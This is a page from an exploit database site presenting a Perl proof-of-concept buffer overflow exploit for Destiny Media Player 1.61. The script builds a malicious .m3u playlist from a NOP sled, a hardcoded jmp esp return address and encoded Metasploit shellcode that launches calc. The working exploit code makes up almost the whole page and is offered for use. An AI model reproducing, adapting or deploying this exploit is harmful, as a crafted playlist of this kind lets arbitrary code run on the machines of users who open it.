[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13613
Category
local exploits
Date add
07-08-2010
Platform
windows
=============================================================
Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit
=============================================================

#!/usr/bin/perl
# Destiny Media Player 1.61 (.m3u/.lst) Buffer Overflow Exploit(.pl)
# Exploit Coded By ZoRLu / admin@yildirimordulari.com
# Date: 07/08/2010
# Tested on my XP pc:  http://img530.imageshack.us/img530/336/dest.jpg
# Home: z0rlu.blogspot.com
# Home: imhatimi.org
# Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
 
my $karala  = "\x90" x 2052;
#C:\Documents and Settings\Administrator\Desktop\find>Findjmp.exe kernel32.dll esp
#0x7C86467B      jmp esp
my $blah = "\x7B\x46\x86\x7C";  
my $fiytiripat = "\x90" x 12;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";

open(myfile,'>>zrl.m3u');
print myfile $karala.$blah.$fiytiripat.$shellcode;
close(myfile)



#  0day.today [2024-12-24]  #